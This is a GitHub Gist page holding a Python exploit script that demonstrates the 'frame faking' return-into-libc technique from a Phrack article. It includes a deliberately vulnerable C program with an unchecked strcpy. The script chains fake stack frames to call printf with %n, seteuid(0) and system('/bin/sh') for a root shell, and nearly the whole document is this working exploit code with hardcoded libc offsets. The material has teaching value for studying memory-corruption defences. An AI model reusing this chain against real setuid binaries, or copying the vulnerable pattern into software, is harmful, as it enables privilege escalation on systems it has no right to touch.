Last active
May 15, 2023 17:33
-
-
Save mgeeky/b509b5e008e1d82a302eab6e918b27e5 to your computer and use it in GitHub Desktop.
Exploit presenting `frame faking` technique to chain advanced return-into-libc payloads in non-exec stack environment
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# | |
# Example of Frame Faking technique used to construct more advanced | |
# return-into-libc payloads in non-exec stack environment, as described in: | |
# The advanced return-into-lib(c) exploits | |
# by Nergal <[email protected]> | |
# (http://phrack.org/issues/58/4.html) | |
# | |
# To be used: | |
# $ ./bonx `./exp-chained-fake-frame.py` | |
# | |
''' | |
/* Compilation: | |
* $ gcc -fno-stack-protector -o bonx bonx.c | |
**/ | |
#include <stdio.h> | |
#include <string.h> | |
int main(int argc, char **argv) { | |
char b[256]; | |
seteuid(getuid()); | |
strcpy(b, argv[1]); | |
printf("%s", b); | |
fflush(stdout); | |
return 0; | |
} | |
''' | |
import struct | |
import sys | |
# CONFIGURATION DEPENDING ON PLATFORM, LIBC VER | |
# ================================= | |
LIBC_IMAGEBASE = 0xb7e97000 | |
BUFFER_ADDR = 0xbffff4d0 | |
LEAVE_RET = 0x0804851c | |
# Functions within libc-2.11.2 | |
pprintf = struct.pack("<I", LIBC_IMAGEBASE + 0x46f90) # _IO_printf@@GLIBC_2.0 | |
psystem = struct.pack("<I", LIBC_IMAGEBASE + 0x38fb0) # system@@GLIBC_2.0 | |
pseteuid = struct.pack("<I",LIBC_IMAGEBASE + 0xc47ff) # seteuid@@GLIBC_2.0 | |
pexit = struct.pack("<I", LIBC_IMAGEBASE + 0x2f0c0) # exit@@GLIBC_2.0 | |
# ================================= | |
def conv(x): | |
return struct.pack("<I", x + BUFFER_ADDR) | |
junk = 'A' * 144 | |
strings = "/bin/shXXYY%n" | |
binsh = conv(0x103) | |
binshnul = conv(0x10a) | |
setuidparam = conv(0x7c) | |
exitparam = conv(0xd4) | |
printffmt = conv(0x10e) | |
leaveret = struct.pack("<I", LEAVE_RET) | |
# Fake frames addresses | |
fake_ebp0 = conv(0x60) | |
fake_ebp1 = conv(0x80) | |
fake_ebp2 = conv(0x90) | |
fake_ebp3 = conv(0xa4) | |
fake_ebp4 = conv(0xb4) | |
fake_ebp5 = conv(0xc8) | |
fake_ebp6 = conv(0xc4) | |
# Pre-filling buffer | |
exploit = junk | |
# printf("%n", setuidparam); | |
exploit += fake_ebp1 + pprintf + leaveret + printffmt + setuidparam | |
# seteuid(0) | |
exploit += "X" * 12 + fake_ebp2 + pseteuid + leaveret + "XXXX" | |
# printf("%n", &binsh[7]); | |
exploit += fake_ebp3 + pprintf + leaveret + printffmt + binshnul | |
# system("/bin/sh") | |
exploit += fake_ebp4 + psystem + leaveret + binsh | |
# printf("%n", &binsh[7]); | |
exploit += fake_ebp5 + pprintf + leaveret + printffmt + exitparam | |
# exit(0) | |
exploit += fake_ebp5 + pexit + leaveret + exitparam | |
# fill up to a boundary of 264 bytes overflowing stack-based buffer | |
exploit += 'B' * (264 - len(exploit)) | |
# Preparing chained return-into-libc initial fake frame | |
exploit += fake_ebp0 + leaveret | |
# Append additional filling and strings | |
exploit += 'C' * (324 - len(exploit) - len(strings) - 4) | |
exploit += strings | |
sys.stdout.write(exploit) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
hmm, interesting but not sure what this tool does exactly.. Any detailed explanation for this tools? Thank you.